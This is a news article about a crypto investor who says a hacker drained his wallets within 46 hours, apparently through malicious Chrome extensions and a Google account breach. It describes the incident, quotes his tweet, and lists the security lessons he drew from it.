A crypto investor, going by the moniker Sell When Over, turned to Twitter to break down an alarming ordeal where a hacker siphoned off $800k from his crypto wallets within a mere 46-hour timeframe. The main problem seems to revolve around a potential Google Chrome exploit, facilitated possibly through delayed updates or undetected malware, leading to the unauthorized installation of malicious extensions.

The Unraveling of Security Layers

Sell When Over recounted how he deferred a Chrome update only to be nudged into it by a subsequent Windows update. Post-restart, Chrome’s alterations were immediate: Vanished tabs and reset extension logins. This anomaly forced him to re-import his wallet seeds—a process he meticulously carried out from a secondary, uncompromised device.

Just realized I got $500k drained from multiple wallet apps 46 hours agoThink I got extension attacked, with two suspicious extensions that appeared on my chrome browserdoes not feel good famstill investigating

— Sell When Over | 9000.sei (@sell9000) April 8, 2024

However, it was the discovery of two peculiar extensions, “Sync Test Beta” and “Simple Game,” coupled with an unsolicited activation of auto-Korean translation, that hinted at a deeper compromise. Intriguingly, one specific wallet app, spared the re-import process, remained unaffected, pinpointing the breach’s origin to a singular compromised PC.

Further digging into these extensions revealed alarming functionalities. “Sync Test Beta,” a vividly colored extension, was identified as a keylogger, secretly transmitting data to an external PHP script. On the other hand, “Simple Game” seemed to monitor browser tab activities. Sell When Over lamented the hindsight wisdom of a complete PC wipe at the slightest anomaly, especially when such peculiarities coincide with significant updates like Chrome’s UI overhaul.

A Costly Lesson in Digital Vigilance

As the thread expanded, Sell When Over unveiled a critical security lapse—a Google login breach linked to an obscure Windows device, possibly spoofing a familiar device name to bypass early detection. This breach was traced back to a VPS hosted by Kaopu Cloud, notorious within hacker circles for its role in various cyber misdemeanors. Despite having two-factor authentication (2FA) enabled, the attacker navigated around it, leaving the exact breach method—ranging from OAuth phishing to cross-site scripting—a matter of speculation.

The incident served as a brutal wake-up call, with Sell When Over sharing several key takeaways:

  1. Disappointment in Bitdefender’s failure to detect any threats, contrasting Malwarebytes’ effectiveness.

  2. A warning against complacency in security, regardless of the amount of crypto handled.

  3. A stern advice against entering seed phrases under any guise, advocating for a fresh system setup instead.

  4. Abandoning Chrome for more secure browsers like Brave.

  5. The importance of device segregation, especially for crypto transactions.

  6. Regular monitoring of Google Activity alerts.

  7. Recommendations to disable extension syncing, especially on devices designated for crypto.

  8. An acknowledgment of 2FA’s limitations.

  9. The necessity for routine security audits and procedural updates to ward off latent threats.

Amidst financial loss, Sell When Over clarified that his hardware wallet remained secure, dismissing any speculation around tax evasion motives behind this revelation. Despite a portion of the stolen funds beginning to be laundered, a hopeful $150k bounty was offered for their return, alongside considerations for a bounty-based forensic investigation.

The saga concluded on a note of continued vigilance, especially against the backdrop of Google’s questionable decision to thread security alerts—a move that potentially masked the intrusion.